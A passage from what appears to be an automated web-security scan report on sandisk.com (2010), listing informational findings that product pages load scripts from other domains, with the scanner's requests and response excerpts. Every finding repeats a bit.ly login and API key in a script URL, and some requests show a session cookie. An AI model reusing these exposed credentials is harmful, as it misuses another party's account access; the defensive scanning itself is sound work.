The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. microSDHC... 32GB* mobile memory cards are a popular way to store your music, videos, photos, games, files and applications on cell phones with memory card slots.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card and shoot more video
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.171. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-microsdhc.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33005
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. microSDHC... 32GB* mobile memory cards are a popular way to store your music, videos, photos, games, files and applications on cell phones with memory card slots.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card and shoot more video
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.172. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-4096-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30020
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk.. 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk.. 8GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk.. 4GB* mobile memory card...and shoot more video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-4096-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.173. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-121-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26257
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk MobileMate... Micro Reader
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-121-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.174. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/netbook-cards/sandisk-netbook-sdhc-memory-card

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/netbook-cards/sandisk-netbook-sdhc-memory-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Give your netbook the space it craves with 16GB SanDisk.. SDHC... memory card...and bring more videos, music and photos with you, wherever you go.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">More videos, songs and applications, take them all with you on a 8GB SanDisk.. SDHC... memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.175. http://www.sandisk.com/products/readers-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /products/readers-accessories HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29556
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.176. http://www.sandisk.com/products/readers-accessories/large-memory-card-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/large-memory-card-case

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDAC-13-G10&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/large-memory-card-case HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24183
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Large Memory Card Case
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDAC-13-G10&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.177. http://www.sandisk.com/products/readers-accessories/micromate-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/micromate-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-113-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/micromate-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25258
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">MicroMate... SDHC
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-113-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.178. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-20-usb-readers

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX3-CF-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/sandisk-extreme-20-usb-readers HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25799
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. 2.0 USB Readers
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX3-CF-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.179. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-firewire-reader

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX4-CF-901&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/sandisk-extreme-firewire-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26487
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. FireWire Readers
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX4-CF-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.180. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDADX6-CF-G20&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


